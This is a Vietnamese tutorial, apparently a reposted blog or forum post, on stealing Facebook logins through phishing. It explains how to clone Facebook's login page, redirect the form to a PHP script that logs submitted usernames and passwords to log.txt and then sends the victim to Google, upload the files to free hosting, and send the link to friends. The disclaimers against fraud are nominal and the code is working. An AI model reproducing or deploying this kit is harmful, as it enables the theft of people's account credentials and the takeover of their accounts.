Hướng dẫn lấy tài khoản Facebook sử dụng phương pháp Phishing

- Nghe hack facebook thì các bạn có thể nghỉ rằng chắc là lừa đảo hay chém gió cho vui, cũng bởi vì facebook là một tập đoàn mạng xã hội lớn nhất hiện tại, hệ thống server, bảo mật của nó là thứ thuộc dạng “siêu nhân” hết rồi, nhưng chúng ta cũng biết rằng, không có 1 căn nhà nào hoàn hảo cả, thế nào cũng phải có lổ cho những con kiến chui vào.

- Nói cho vui thôi, thật chất là với khả năng gà mờ của mình thì chẳng thể làm gì thằng facebook cả, mục đích là vọc phá cho vui, ở đây chúng ta sử dụng phương pháp phishing để đánh lừa nạn nhân. Phương pháp này thì cũng thuộc dạng cổ điển nhưng vẫn rất hiệu quả. Trong bài viết này, mình sẽ hướng dẫn sử dụng 1 cách cơ bản và dễ nhất cho mọi người nhưng cũng đòi hỏi bắt buộc các bạn phải có 1 chút kiến thức về web, hosting. Còn nếu không có thì phải tìm hiểu cách tạo 1 trang web miễn phí rồi hãy đọc tiếp.

 - Vào vấn đề chính, mục đích của chúng ta là đánh lừa nạn nhân rằng họ đang ở website của facebook (nhưng thật chất là web fake của mình tạo ra thôi) và đăng nhập tài khoản với password vào, lúc này tài khoản và password sẽ tự động gửi về host của mình. Và 1 điều cần nói là hy vọng các bạn không sử dụng phương pháp này để quậy phá hay có hành vi trộm cắp thông tin cá nhân của người khác, chủ yếu là để vọc phá thôi. 

- Đầu tiên các bạn truy cập vào https://www.facebook.com 

 Click chuột phải vào vùng trống và chọn view source (firefox) hoặc view page source (chrome), nó sẽ ra 1 trang toàn là chữ với chữ, chúng ta copy hết nguyên đống code này về bỏ vào 1 file notepad, save lại với tên file là index.html để nó thành 1 web tĩnh. Bạn có thể mở nó lên lại thử xem có phải hiện ra trang đăng nhập của facebook không. Hoặc các bạn có thể CTRL + U để view code.

- Sau đó mở lại file index lên bằng notepad, nhấn Ctr + F để mở khung tìm kiếm, bạn gõ chữ “action” và nhấn find để tìm, nó sẽ tìm tới dòng có dạng như sau thì dừng lại: action=”http://www.facebook.com/login.php?login_atempt=1“, lúc này bạn thay dòng http://http://www.facebook.com/login.php?login_atempt=1 trong ngoặc kép thành login.php, save lại.

- Xong phần web fake, giờ chúng ta tạo mới 1 file notepad với nội dung như sau: 

<?php
header ('Location: https://www.google.com/accounts/Serv...h?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

trong code có đoạn link "https://google.com.vn"
Khi ai đó click vào chữ đăng nhập trên fake page của bạn thì sẽ được chuyển hướng sang cái link đó...bạn có thể chỉnh lại cái link đó tùy theo cách sử dụng của bạn.

Tạo ra tiếp 1 file nữa là "log.txt" rồi để đó.

Vậy là xong...tiếp theo các bạn upload cả 3 file này nên 1 webhosting nào đó ( các bạn có thể search trên google)
www.110mb.com
www.t35.com
www.ripway.com
www.my3gb.com ( ở đây mình chọn my3gb.com)

Nhớ là fải đăng kí đó nha rồi mới đc up
Sau khi đăng kí xong bạn vào mục file manager, chọn upload files và upload cả 3 file vừa tạo xong 



Sau khi upload xong...link fake page của bạn sẽ có dạng "username-của-bạn.my3gb.com/facebook.html"
như ở đây username của mình là skumfuk vậy link fake page sẽ là như này:

rồi bạn send link đó sang cho bạn bè để chêu đùa nhau chặng hạn( mình ko khuyến cáo đi lừa đảo đâu nha ^^)....khi họ gõ tài khoản và pass vào đó....thì những thông tin đó sẽ được lưu lại ở file log.txt trên host. Mở file đó lên để xem ^^
Nguồn: Sưu tầm.... :P